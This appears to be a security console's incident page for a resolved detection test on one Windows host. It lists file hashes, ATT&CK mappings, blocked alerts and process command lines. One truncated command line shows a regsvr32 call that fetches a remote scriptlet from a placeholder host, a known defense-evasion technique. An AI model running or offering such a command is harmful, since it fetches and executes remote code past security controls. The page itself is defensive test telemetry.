HIGH 'Protection Against Security Measures Bypass Techniques - 1952317967' along with 5 other issues

RESOLVED SECURITY TESTING ID: #1106 | Created: 2026-01-09 23:36:05
XDR Console
6
Alerts
1
Hosts
10
Files
0
Network
Incident Overview

'Protection Against Security Measures Bypass Techniques - 1952317967' along with 5 other issues generated by XDR Agent detected on host teahee involving user dokji

6
2026-01-10 00:50
Unassigned
XDR Agent
Malware
Affected Hosts & Users
dokji
MITRE ATT&CK Mapping
TA0005 - Defense Evasion TA0002 - Execution
T1059 - Command and Scripting Interpreter T1059.001 - Command and Scripting Interpreter: PowerShell
File Artifacts 10
File Name Path SHA256 Signature Verdict Actions
UltimateXdrGenerator.exe - af362370742931d534c21901f6b41bf8d034bf5d7e80a571d5eca6bc871ff499 SIGNATURE_UNAVAILABLE UNKNOWN VT
MegaGenerator.exe - e11e17aa538668963d62d7ba8fcb3e705b437f4a8e3e3333c2afc0c3552b2edf SIGNATURE_UNAVAILABLE UNKNOWN VT
cmd.exe - 64afc6db3aad1289533662e2d79e27dd55c7dcdb8cd918b08e145ad82ad5acb4 SIGNATURE_SIGNED UNKNOWN VT
powershell.exe - 0ff6f2c94bc7e2833a5f7e16de1622e5dba70396f31c7d5f56381870317e8c46 SIGNATURE_SIGNED UNKNOWN VT
python.exe - fda7026477256845afab371e354c4d512896665f1761939cb5887d0a9dec257a SIGNATURE_SIGNED UNKNOWN VT
conhost.exe - 6651a3beb0df1e66363a950c37dc9305f185d161fb03761e172ccfa0a4ab4f89 SIGNATURE_SIGNED UNKNOWN VT
timeout.exe - 106490870753d87d0c5a1b4fe83045a06518d415ec595bd1d0c30fe3ed4149c1 SIGNATURE_SIGNED UNKNOWN VT
wscript.exe - 5919e37adbf233d1aadf793959eeeb7d1eba073b23b3572016564b407f0ad93f SIGNATURE_SIGNED UNKNOWN VT
chcp.com - 8d75e783f327f899a42927fc2927f0e3d1ec62c4ca1dc88de04dd67de9ae555d SIGNATURE_SIGNED UNKNOWN VT
regsvr32.exe - f379c637eb2250f0cdae05918035a37f3fdf89d6b2ad897da235c5f603fe2a1e SIGNATURE_SIGNED UNKNOWN VT
Network Artifacts 0
No network artifacts found for this incident
Process Artifacts 6
Process Command Line Parent Process User
wscript.exe "wscript.exe" "C:\app\cortex-xdr-siem-test\xdr_hidden_runner.vbs" --once - dokji
wscript.exe "wscript.exe" "C:\app\cortex-xdr-siem-test\xdr_hidden_runner.vbs" --once - dokji
UltimateXdrGenerator.exe "C:\app\cortex-xdr-siem-test\xdr_tools\UltimateXdrGenerator\bin\publish\Ultimate... - dokji
MegaGenerator.exe "C:\app\cortex-xdr-siem-test\xdr_tools\MegaGenerator\bin\publish\MegaGenerator.e... - dokji
cmd.exe C:\WINDOWS\system32\cmd.exe /c "regsvr32 /s /n /u /i:http://example.com/test.sct... - dokji
UltimateXdrGenerator.exe "C:\app\cortex-xdr-siem-test\xdr_tools\UltimateXdrGenerator\bin\publish\Ultimate... - dokji
Registry Artifacts 0
No registry artifacts found for this incident
Analyst Verdict
HIGH
  • Isolate affected endpoints
  • Investigate all related alerts
  • Document findings
Summary
6
Alerts
1
Hosts
10
Files
0
Network
Alert Categories
Malware
Timeline
01-10 00:50:05
Incident Modified
Status or details updated
01-10 00:50:05
Incident Resolved
resolved security testing
01-10 00:42:21
Protection Against Security Measures Bypass Techniques - 1952317967
high - Detected (Reported)
01-10 00:42:19
Protection Against Security Measures Bypass Techniques - 1952317967
high - Prevented (Blocked)
01-10 00:39:02
WildFire Malware
medium - Prevented (Blocked)
01-10 00:33:01
WildFire Malware
medium - Prevented (Blocked)
01-10 00:08:14
Suspicious Process Creation
medium - Prevented (Blocked)
01-09 23:36:05
Incident Created
#1106 - 'Protection Against Security Measures Bypass Techniques - 1952317967' along with 5 other issues
01-09 23:36:05
UltimateXdrGenerator.exe
Verdict: Unknown
01-09 23:36:05
MegaGenerator.exe
Verdict: Unknown
01-09 23:36:05
cmd.exe
Verdict: Unknown
01-09 23:36:05
powershell.exe
Verdict: Unknown
01-09 23:36:05
python.exe
Verdict: Unknown
01-09 23:36:05
conhost.exe
Verdict: Unknown
01-09 23:36:05
timeout.exe
Verdict: Unknown
01-09 23:36:05
wscript.exe
Verdict: Unknown
01-09 23:36:05
chcp.com
Verdict: Unknown
01-09 23:36:05
regsvr32.exe
Verdict: Unknown
01-09 23:36:02
WildFire Malware
medium - Prevented (Blocked)